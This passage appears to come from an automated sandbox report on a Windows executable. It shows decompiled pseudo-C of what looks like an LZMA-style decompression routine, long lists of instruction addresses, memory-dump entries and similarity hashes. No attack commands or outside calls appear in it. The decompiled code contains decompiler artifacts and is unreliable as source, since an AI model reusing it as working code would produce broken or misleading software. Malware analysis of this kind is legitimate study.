											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                                0x004063d9
                                                                                0x004063d9
                                                                                0x004063d9
                                                                                0x004063d9
                                                                                0x004063df
                                                                                0x004063e3
                                                                                0x004063e7
                                                                                0x004063f1
                                                                                0x004063ff
                                                                                0x004066d5
                                                                                0x004066d5
                                                                                0x004066d8
                                                                                0x004066df
                                                                                0x0040670c
                                                                                0x0040670c
                                                                                0x00406710
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406712
                                                                                0x0040671b
                                                                                0x00406721
                                                                                0x00406724
                                                                                0x00406727
                                                                                0x0040672a
                                                                                0x0040672d
                                                                                0x00406733
                                                                                0x0040674c
                                                                                0x0040674f
                                                                                0x0040675b
                                                                                0x0040675c
                                                                                0x0040675f
                                                                                0x00406735
                                                                                0x00406735
                                                                                0x00406744
                                                                                0x00406747
                                                                                0x00406747
                                                                                0x00406769
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x00406709
                                                                                0x0040670c
                                                                                0x00406710
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040676b
                                                                                0x0040676b
                                                                                0x004066e4
                                                                                0x004066e8
                                                                                0x00406820
                                                                                0x00406820
                                                                                0x0040682a
                                                                                0x00406832
                                                                                0x00406839
                                                                                0x0040683b
                                                                                0x00406842
                                                                                0x00406846
                                                                                0x00406846
                                                                                0x004066ee
                                                                                0x004066f4
                                                                                0x004066fb
                                                                                0x00406703
                                                                                0x00406703
                                                                                0x00406706
                                                                                0x00000000
                                                                                0x00406706
                                                                                0x00406770
                                                                                0x0040677d
                                                                                0x00406780
                                                                                0x0040668c
                                                                                0x0040668c
                                                                                0x0040668c
                                                                                0x00405e28
                                                                                0x00405e28
                                                                                0x00405e28
                                                                                0x00405e31
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e37
                                                                                0x00405e37
                                                                                0x00000000
                                                                                0x00405e3e
                                                                                0x00405e42
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e48
                                                                                0x00405e4b
                                                                                0x00405e4e
                                                                                0x00405e51
                                                                                0x00405e55
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e5b
                                                                                0x00405e5b
                                                                                0x00405e5e
                                                                                0x00405e60
                                                                                0x00405e61
                                                                                0x00405e64
                                                                                0x00405e66
                                                                                0x00405e67
                                                                                0x00405e69
                                                                                0x00405e6c
                                                                                0x00405e71
                                                                                0x00405e76
                                                                                0x00405e7f
                                                                                0x00405e92
                                                                                0x00405e95
                                                                                0x00405ea1
                                                                                0x00405ec9
                                                                                0x00405ecb
                                                                                0x00405ed9
                                                                                0x00405ed9
                                                                                0x00405edd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405ecd
                                                                                0x00405ecd
                                                                                0x00405ed0
                                                                                0x00405ed1
                                                                                0x00405ed1
                                                                                0x00000000
                                                                                0x00405ecd
                                                                                0x00405ea3
                                                                                0x00405ea7
                                                                                0x00405eac
                                                                                0x00405eac
                                                                                0x00405eb5
                                                                                0x00405ebd
                                                                                0x00405ec0
                                                                                0x00000000
                                                                                0x00405ec6
                                                                                0x00405ec6
                                                                                0x00000000
                                                                                0x00405ec6
                                                                                0x00000000
                                                                                0x00405ee3
                                                                                0x00405ee3
                                                                                0x00405ee7
                                                                                0x00406793
                                                                                0x00406793
                                                                                0x00000000
                                                                                0x00406793
                                                                                0x00405eed
                                                                                0x00405ef0
                                                                                0x00405f00
                                                                                0x00405f03
                                                                                0x00405f06
                                                                                0x00405f06
                                                                                0x00405f06
                                                                                0x00405f09
                                                                                0x00405f0d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f0f
                                                                                0x00405f0f
                                                                                0x00405f15
                                                                                0x00405f3f
                                                                                0x00405f45
                                                                                0x00405f4c
                                                                                0x00000000
                                                                                0x00405f4c
                                                                                0x00405f17
                                                                                0x00405f1b
                                                                                0x00405f1e
                                                                                0x00405f23
                                                                                0x00405f23
                                                                                0x00405f2e
                                                                                0x00405f36
                                                                                0x00405f39
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f7e
                                                                                0x00405f84
                                                                                0x00405f87
                                                                                0x00405f94
                                                                                0x00405f9c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405f53
                                                                                0x00405f53
                                                                                0x00405f57
                                                                                0x004067a2
                                                                                0x004067a2
                                                                                0x00000000
                                                                                0x004067a2
                                                                                0x00405f5d
                                                                                0x00405f63
                                                                                0x00405f6e
                                                                                0x00405f6e
                                                                                0x00405f6e
                                                                                0x00405f71
                                                                                0x00405f74
                                                                                0x00405f77
                                                                                0x00405f7c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406613
                                                                                0x00406613
                                                                                0x00406619
                                                                                0x0040661f
                                                                                0x00406625
                                                                                0x0040663f
                                                                                0x00406642
                                                                                0x00406648
                                                                                0x00406653
                                                                                0x00406653
                                                                                0x00406655
                                                                                0x00406627
                                                                                0x00406627
                                                                                0x00406636
                                                                                0x0040663a
                                                                                0x0040663a
                                                                                0x0040665f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406661
                                                                                0x00406665
                                                                                0x00406814
                                                                                0x00406814
                                                                                0x00000000
                                                                                0x00406814
                                                                                0x0040666b
                                                                                0x00406671
                                                                                0x00406678
                                                                                0x00406680
                                                                                0x00406683
                                                                                0x00406686
                                                                                0x00406686
                                                                                0x0040668c
                                                                                0x0040668c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405fa4
                                                                                0x00405fa4
                                                                                0x00405fa6
                                                                                0x00405fa9
                                                                                0x0040601a
                                                                                0x0040601a
                                                                                0x0040601d
                                                                                0x00406020
                                                                                0x00406027
                                                                                0x00406031
                                                                                0x00000000
                                                                                0x00406031
                                                                                0x00405fab
                                                                                0x00405fab
                                                                                0x00405faf
                                                                                0x00405fb2
                                                                                0x00405fb4
                                                                                0x00405fb7
                                                                                0x00405fba
                                                                                0x00405fbc
                                                                                0x00405fbf
                                                                                0x00405fc1
                                                                                0x00405fc6
                                                                                0x00405fc9
                                                                                0x00405fcc
                                                                                0x00405fd0
                                                                                0x00405fd7
                                                                                0x00405fda
                                                                                0x00405fe1
                                                                                0x00405fe5
                                                                                0x00405fed
                                                                                0x00405fed
                                                                                0x00405fed
                                                                                0x00405fe7
                                                                                0x00405fe7
                                                                                0x00405fe7
                                                                                0x00405fdc
                                                                                0x00405fdc
                                                                                0x00405fdc
                                                                                0x00405ff1
                                                                                0x00405ff4
                                                                                0x00406012
                                                                                0x00406012
                                                                                0x00406014
                                                                                0x00000000
                                                                                0x00405ff6
                                                                                0x00405ff6
                                                                                0x00405ff6
                                                                                0x00405ff9
                                                                                0x00405ffc
                                                                                0x00405fff
                                                                                0x00406001
                                                                                0x00406001
                                                                                0x00406001
                                                                                0x00406004
                                                                                0x00406007
                                                                                0x00406009
                                                                                0x0040600a
                                                                                0x0040600d
                                                                                0x00000000
                                                                                0x0040600d
                                                                                0x00000000
                                                                                0x00406243
                                                                                0x00406243
                                                                                0x00406247
                                                                                0x00406265
                                                                                0x00406265
                                                                                0x00406268
                                                                                0x0040626f
                                                                                0x00406272
                                                                                0x00406275
                                                                                0x00406278
                                                                                0x0040627b
                                                                                0x0040627e
                                                                                0x00406280
                                                                                0x00406287
                                                                                0x00406288
                                                                                0x0040628a
                                                                                0x0040628d
                                                                                0x00406290
                                                                                0x00406293
                                                                                0x00406293
                                                                                0x00406298
                                                                                0x00000000
                                                                                0x00406298
                                                                                0x00406249
                                                                                0x00406249
                                                                                0x0040624c
                                                                                0x0040624f
                                                                                0x00406259
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004062ad
                                                                                0x004062ad
                                                                                0x004062b1
                                                                                0x004062d4
                                                                                0x004062d7
                                                                                0x004062da
                                                                                0x004062e4
                                                                                0x004062b3
                                                                                0x004062b3
                                                                                0x004062b6
                                                                                0x004062b9
                                                                                0x004062bc
                                                                                0x004062c9
                                                                                0x004062cc
                                                                                0x004062cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004062f0
                                                                                0x004062f0
                                                                                0x004062f4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004062fa
                                                                                0x004062fa
                                                                                0x004062fe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406304
                                                                                0x00406304
                                                                                0x00406306
                                                                                0x0040630a
                                                                                0x0040630a
                                                                                0x0040630d
                                                                                0x00406311
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406361
                                                                                0x00406361
                                                                                0x00406365
                                                                                0x0040636c
                                                                                0x0040636c
                                                                                0x0040636f
                                                                                0x00406372
                                                                                0x0040637c
                                                                                0x00000000
                                                                                0x0040637c
                                                                                0x00406367
                                                                                0x00406367
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406388
                                                                                0x00406388
                                                                                0x0040638c
                                                                                0x00406393
                                                                                0x00406396
                                                                                0x00406399
                                                                                0x0040638e
                                                                                0x0040638e
                                                                                0x0040638e
                                                                                0x0040639c
                                                                                0x0040639f
                                                                                0x004063a2
                                                                                0x004063a2
                                                                                0x004063a5
                                                                                0x004063a8
                                                                                0x004063ab
                                                                                0x004063ab
                                                                                0x004063ae
                                                                                0x004063b5
                                                                                0x004063ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406448
                                                                                0x00406448
                                                                                0x0040644c
                                                                                0x004067ea
                                                                                0x004067ea
                                                                                0x00000000
                                                                                0x004067ea
                                                                                0x00406452
                                                                                0x00406452
                                                                                0x00406455
                                                                                0x00406458
                                                                                0x0040645c
                                                                                0x0040645f
                                                                                0x00406465
                                                                                0x00406467
                                                                                0x00406467
                                                                                0x00406467
                                                                                0x0040646a
                                                                                0x0040646d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040603d
                                                                                0x0040603d
                                                                                0x00406041
                                                                                0x004067ae
                                                                                0x004067ae
                                                                                0x00000000
                                                                                0x004067ae
                                                                                0x00406047
                                                                                0x00406047
                                                                                0x0040604a
                                                                                0x0040604d
                                                                                0x00406051
                                                                                0x00406054
                                                                                0x0040605a
                                                                                0x0040605c
                                                                                0x0040605c
                                                                                0x0040605c
                                                                                0x0040605f
                                                                                0x00406062
                                                                                0x00406062
                                                                                0x00406065
                                                                                0x00406068
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040606e
                                                                                0x0040606e
                                                                                0x00406074
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040607a
                                                                                0x0040607a
                                                                                0x0040607e
                                                                                0x00406081
                                                                                0x00406084
                                                                                0x00406087
                                                                                0x0040608a
                                                                                0x0040608b
                                                                                0x0040608e
                                                                                0x00406090
                                                                                0x00406096
                                                                                0x00406099
                                                                                0x0040609c
                                                                                0x0040609f
                                                                                0x004060a2
                                                                                0x004060a5
                                                                                0x004060a8
                                                                                0x004060c4
                                                                                0x004060c7
                                                                                0x004060ca
                                                                                0x004060cd
                                                                                0x004060d4
                                                                                0x004060d8
                                                                                0x004060da
                                                                                0x004060de
                                                                                0x004060aa
                                                                                0x004060aa
                                                                                0x004060ae
                                                                                0x004060b6
                                                                                0x004060bb
                                                                                0x004060bd
                                                                                0x004060bf
                                                                                0x004060bf
                                                                                0x004060e1
                                                                                0x004060e8
                                                                                0x004060eb
                                                                                0x00000000
                                                                                0x004060f1
                                                                                0x004060f1
                                                                                0x00000000
                                                                                0x004060f1
                                                                                0x00000000
                                                                                0x004060f6
                                                                                0x004060f6
                                                                                0x004060fa
                                                                                0x004067ba
                                                                                0x004067ba
                                                                                0x00000000
                                                                                0x004067ba
                                                                                0x00406100
                                                                                0x00406100
                                                                                0x00406103
                                                                                0x00406106
                                                                                0x0040610a
                                                                                0x0040610d
                                                                                0x00406113
                                                                                0x00406115
                                                                                0x00406115
                                                                                0x00406115
                                                                                0x00406118
                                                                                0x0040611b
                                                                                0x0040611b
                                                                                0x0040611b
                                                                                0x00406121
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406123
                                                                                0x00406123
                                                                                0x00406126
                                                                                0x00406129
                                                                                0x0040612c
                                                                                0x0040612f
                                                                                0x00406132
                                                                                0x00406135
                                                                                0x00406138
                                                                                0x0040613b
                                                                                0x0040613e
                                                                                0x00406141
                                                                                0x00406159
                                                                                0x0040615c
                                                                                0x0040615f
                                                                                0x00406162
                                                                                0x00406162
                                                                                0x00406165
                                                                                0x00406169
                                                                                0x0040616b
                                                                                0x00406143
                                                                                0x00406143
                                                                                0x0040614b
                                                                                0x00406150
                                                                                0x00406152
                                                                                0x00406154
                                                                                0x00406154
                                                                                0x0040616e
                                                                                0x00406175
                                                                                0x00406178
                                                                                0x00000000
                                                                                0x0040617a
                                                                                0x0040617a
                                                                                0x00000000
                                                                                0x0040617a
                                                                                0x00406178
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x0040617f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004061ba
                                                                                0x004061ba
                                                                                0x004061be
                                                                                0x004067c6
                                                                                0x004067c6
                                                                                0x00000000
                                                                                0x004067c6
                                                                                0x004061c4
                                                                                0x004061c4
                                                                                0x004061c7
                                                                                0x004061ca
                                                                                0x004061ce
                                                                                0x004061d1
                                                                                0x004061d7
                                                                                0x004061d9
                                                                                0x004061d9
                                                                                0x004061d9
                                                                                0x004061dc
                                                                                0x004061df
                                                                                0x004061df
                                                                                0x004061e5
                                                                                0x00406183
                                                                                0x00406183
                                                                                0x00406186
                                                                                0x00000000
                                                                                0x00406186
                                                                                0x004061e7
                                                                                0x004061e7
                                                                                0x004061ea
                                                                                0x004061ed
                                                                                0x004061f0
                                                                                0x004061f3
                                                                                0x004061f6
                                                                                0x004061f9
                                                                                0x004061fc
                                                                                0x004061ff
                                                                                0x00406202
                                                                                0x00406205
                                                                                0x0040621d
                                                                                0x00406220
                                                                                0x00406223
                                                                                0x00406226
                                                                                0x00406226
                                                                                0x00406229
                                                                                0x0040622d
                                                                                0x0040622f
                                                                                0x00406207
                                                                                0x00406207
                                                                                0x0040620f
                                                                                0x00406214
                                                                                0x00406216
                                                                                0x00406218
                                                                                0x00406218
                                                                                0x00406232
                                                                                0x00406239
                                                                                0x0040623c
                                                                                0x00000000
                                                                                0x0040623e
                                                                                0x0040623e
                                                                                0x00000000
                                                                                0x0040623e
                                                                                0x00000000
                                                                                0x004064cb
                                                                                0x004064cb
                                                                                0x004064cf
                                                                                0x004067f6
                                                                                0x004067f6
                                                                                0x00000000
                                                                                0x004067f6
                                                                                0x004064d5
                                                                                0x004064d5
                                                                                0x004064d8
                                                                                0x004064db
                                                                                0x004064df
                                                                                0x004064e2
                                                                                0x004064e8
                                                                                0x004064ea
                                                                                0x004064ea
                                                                                0x004064ea
                                                                                0x004064ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040629b
                                                                                0x0040629b
                                                                                0x0040629e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004065da
                                                                                0x004065da
                                                                                0x004065de
                                                                                0x00406600
                                                                                0x00406600
                                                                                0x00406603
                                                                                0x0040660d
                                                                                0x00406610
                                                                                0x00406610
                                                                                0x00000000
                                                                                0x00406610
                                                                                0x004065e0
                                                                                0x004065e0
                                                                                0x004065e3
                                                                                0x004065e7
                                                                                0x004065ea
                                                                                0x004065ea
                                                                                0x004065ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406697
                                                                                0x00406697
                                                                                0x0040669b
                                                                                0x004066b9
                                                                                0x004066b9
                                                                                0x004066b9
                                                                                0x004066b9
                                                                                0x004066c0
                                                                                0x004066c7
                                                                                0x004066ce
                                                                                0x004066ce
                                                                                0x004066d5
                                                                                0x004066d8
                                                                                0x004066df
                                                                                0x00000000
                                                                                0x004066e2
                                                                                0x0040669d
                                                                                0x0040669d
                                                                                0x004066a0
                                                                                0x004066a3
                                                                                0x004066a6
                                                                                0x004066ad
                                                                                0x004065f1
                                                                                0x004065f1
                                                                                0x004065f4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406788
                                                                                0x00406788
                                                                                0x0040678b
                                                                                0x0040668c
                                                                                0x0040668c
                                                                                0x0040668c
                                                                                0x00000000
                                                                                0x00406692
                                                                                0x00000000
                                                                                0x004063c2
                                                                                0x004063c2
                                                                                0x004063c4
                                                                                0x004063cb
                                                                                0x004063cc
                                                                                0x004063ce
                                                                                0x004063d1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004066d5
                                                                                0x004066d5
                                                                                0x004066d8
                                                                                0x004066df
                                                                                0x00000000
                                                                                0x004066e2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406407
                                                                                0x00406407
                                                                                0x0040640a
                                                                                0x00406440
                                                                                0x00406440
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406570
                                                                                0x00406573
                                                                                0x00406573
                                                                                0x00406576
                                                                                0x00406578
                                                                                0x00406802
                                                                                0x00406802
                                                                                0x00000000
                                                                                0x00406802
                                                                                0x0040657e
                                                                                0x0040657e
                                                                                0x00406581
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406587
                                                                                0x00406587
                                                                                0x0040658b
                                                                                0x0040658e
                                                                                0x0040658e
                                                                                0x0040658e
                                                                                0x00000000
                                                                                0x0040658e
                                                                                0x0040640c
                                                                                0x0040640c
                                                                                0x0040640e
                                                                                0x00406410
                                                                                0x00406412
                                                                                0x00406415
                                                                                0x00406416
                                                                                0x00406418
                                                                                0x0040641a
                                                                                0x0040641d
                                                                                0x00406420
                                                                                0x00406436
                                                                                0x00406436
                                                                                0x0040643b
                                                                                0x00406473
                                                                                0x00406473
                                                                                0x00406477
                                                                                0x004064a0
                                                                                0x004064a3
                                                                                0x004064a5
                                                                                0x004064ac
                                                                                0x004064af
                                                                                0x004064b2
                                                                                0x004064b2
                                                                                0x004064b7
                                                                                0x004064b7
                                                                                0x004064b9
                                                                                0x004064bc
                                                                                0x004064c3
                                                                                0x004064c6
                                                                                0x004064f3
                                                                                0x004064f3
                                                                                0x004064f6
                                                                                0x004064f9
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x00000000
                                                                                0x0040656d
                                                                                0x004064fb
                                                                                0x004064fb
                                                                                0x00406501
                                                                                0x00406504
                                                                                0x00406507
                                                                                0x0040650a
                                                                                0x0040650d
                                                                                0x00406510
                                                                                0x00406513
                                                                                0x00406516
                                                                                0x00406519
                                                                                0x0040651c
                                                                                0x00406535
                                                                                0x00406537
                                                                                0x0040653a
                                                                                0x0040653b
                                                                                0x0040653e
                                                                                0x00406540
                                                                                0x00406543
                                                                                0x00406545
                                                                                0x00406547
                                                                                0x0040654a
                                                                                0x0040654c
                                                                                0x0040654f
                                                                                0x00406553
                                                                                0x00406555
                                                                                0x00406555
                                                                                0x00406556
                                                                                0x00406559
                                                                                0x0040655c
                                                                                0x0040651e
                                                                                0x0040651e
                                                                                0x00406526
                                                                                0x0040652b
                                                                                0x0040652d
                                                                                0x00406530
                                                                                0x00406530
                                                                                0x0040655f
                                                                                0x00406566
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00406568
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00406566
                                                                                0x00406479
                                                                                0x00406479
                                                                                0x0040647c
                                                                                0x0040647e
                                                                                0x00406481
                                                                                0x00406484
                                                                                0x00406487
                                                                                0x00406489
                                                                                0x0040648c
                                                                                0x0040648f
                                                                                0x0040648f
                                                                                0x00406492
                                                                                0x00406492
                                                                                0x00406495
                                                                                0x0040649c
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x0040649e
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x0040649c
                                                                                0x00406422
                                                                                0x00406422
                                                                                0x00406425
                                                                                0x00406427
                                                                                0x0040642a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406189
                                                                                0x00406189
                                                                                0x0040618d
                                                                                0x004067d2
                                                                                0x004067d2
                                                                                0x00000000
                                                                                0x004067d2
                                                                                0x00406193
                                                                                0x00406193
                                                                                0x00406196
                                                                                0x00406199
                                                                                0x0040619c
                                                                                0x0040619f
                                                                                0x004061a2
                                                                                0x004061a5
                                                                                0x004061a7
                                                                                0x004061aa
                                                                                0x004061ad
                                                                                0x004061b0
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406314
                                                                                0x00406314
                                                                                0x00406318
                                                                                0x004067de
                                                                                0x004067de
                                                                                0x00000000
                                                                                0x004067de
                                                                                0x0040631e
                                                                                0x0040631e
                                                                                0x00406321
                                                                                0x00406324
                                                                                0x00406327
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x0040632c
                                                                                0x0040632f
                                                                                0x00406332
                                                                                0x00406335
                                                                                0x00406338
                                                                                0x0040633b
                                                                                0x0040633c
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x00406341
                                                                                0x00406344
                                                                                0x00406347
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634d
                                                                                0x0040634f
                                                                                0x0040634f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406595
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040659b
                                                                                0x0040659b
                                                                                0x0040659e
                                                                                0x004065a1
                                                                                0x004065a4
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a9
                                                                                0x004065ac
                                                                                0x004065af
                                                                                0x004065b2
                                                                                0x004065b5
                                                                                0x004065b8
                                                                                0x004065b9
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065be
                                                                                0x004065c1
                                                                                0x004065c4
                                                                                0x004065c7
                                                                                0x004065ca
                                                                                0x004065ce
                                                                                0x004065d0
                                                                                0x004065d3
                                                                                0x00000000
                                                                                0x004065d5
                                                                                0x004065d5
                                                                                0x00406352
                                                                                0x00406352
                                                                                0x00000000
                                                                                0x00406352
                                                                                0x004065d3
                                                                                0x00406808
                                                                                0x00406808
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e37
                                                                                0x0040683f
                                                                                0x0040683f
                                                                                0x00000000
                                                                                0x0040683f
                                                                                0x0040668c
                                                                                0x0040670c
                                                                                0x004066d5

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 89797f99b3dec6267cc1c681575611e034a20447ed55f7cd3c80b3942b488404
                                                                                • Instruction ID: deda071cd4af7bae2145d0ede0755f0989d7145f7e4fffbd7a643efa013d00ad
                                                                                • Opcode Fuzzy Hash: 89797f99b3dec6267cc1c681575611e034a20447ed55f7cd3c80b3942b488404
                                                                                • Instruction Fuzzy Hash: B0A16571D00229CBDF28CFA8C8547ADBBB1FF44305F15852AD816BB281D7785A86CF84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004065DA, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E004065DA() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406847))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
